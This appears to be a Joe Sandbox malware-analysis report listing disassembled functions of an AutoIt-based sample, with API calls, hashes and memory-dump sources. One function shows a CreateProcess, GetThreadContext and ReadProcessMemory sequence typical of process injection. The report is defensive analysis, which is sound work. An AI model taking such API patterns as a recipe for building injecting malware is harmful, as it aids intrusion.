                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                            • Opcode Fuzzy Hash: afcf258d4bd88d8ea756dbb23f6f5e28355c73968809c2117334dc7dbfffea7a
                                                            • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                            Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                            • String ID:
                                                            • API String ID: 1794320848-0
                                                            • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                            • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                            • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                            Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                            • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentTerminate
                                                            • String ID:
                                                            • API String ID: 2429186680-0
                                                            • Opcode ID: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                            • Opcode Fuzzy Hash: 0f578ce52da9f9b4c714c296b9d78fbd636f242c945bc8d5a468c0e4c8bdb3ba
                                                            • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                            Function 0040E0C0 Relevance: 4.6, APIs: 3, Instructions: 82windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                                            • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                                            • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                                            Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _malloc.LIBCMT ref: 0043214B
                                                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                            • _malloc.LIBCMT ref: 0043215D
                                                            • _malloc.LIBCMT ref: 0043216F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _malloc$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 680241177-0
                                                            • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                            • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                                            • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                                            • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                                            Function 0040F570 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 247COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                            • _free.LIBCMT ref: 004295A0
                                                              • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                              • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                              • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                              • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                              • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                              • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                            • API String ID: 3938964917-2806939583
                                                            • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                            • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                            • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                                                            • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                            Function 00410100 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _strcat
                                                            • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                            • API String ID: 1765576173-2684727018
                                                            • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                            • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                            • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                                            • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                            Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 004678F7
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__wsplitpath_malloc
                                                            • String ID:
                                                            • API String ID: 4163294574-0
                                                            • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                                                            • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                                                            • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                                                            Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                              • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                            • _strcat.LIBCMT ref: 0040F786
                                                              • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                              • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                            • String ID:
                                                            • API String ID: 3199840319-0
                                                            • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                            • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                                            • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                                                            • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                                            Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                            • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: FreeInfoLibraryParametersSystem
                                                            • String ID:
                                                            • API String ID: 3403648963-0
                                                            • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                                            • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                                            • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                                            Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                                                            • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                                                            • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                                                            Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            • __lock_file.LIBCMT ref: 00414A8D
                                                              • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                            • __fclose_nolock.LIBCMT ref: 00414A98
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                            • String ID:
                                                            • API String ID: 2800547568-0
                                                            • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                                            • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                                            • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                                            Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock_file.LIBCMT ref: 00415012
                                                            • __ftell_nolock.LIBCMT ref: 0041501F
                                                              • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                            • String ID:
                                                            • API String ID: 2999321469-0
                                                            • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                                            • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                                            • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                                            Function 02E7129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 02E71A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E71AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E71B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681999873.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2e70000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction ID: d3de9718a158fec4f2658539d32bec16ab1397486948f1af1a159dd6b3281d4c
                                                            • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                            • Instruction Fuzzy Hash: FE12BE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CF5A
                                                            Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
                                                            • Opcode ID: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                            • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                                            • Opcode Fuzzy Hash: 6d743864f950f4e8dd6af4daa6c332586bf39a41c922c31670318adef7ff7de3
                                                            • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                                            Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID:
                                                            • API String ID: 4104443479-0
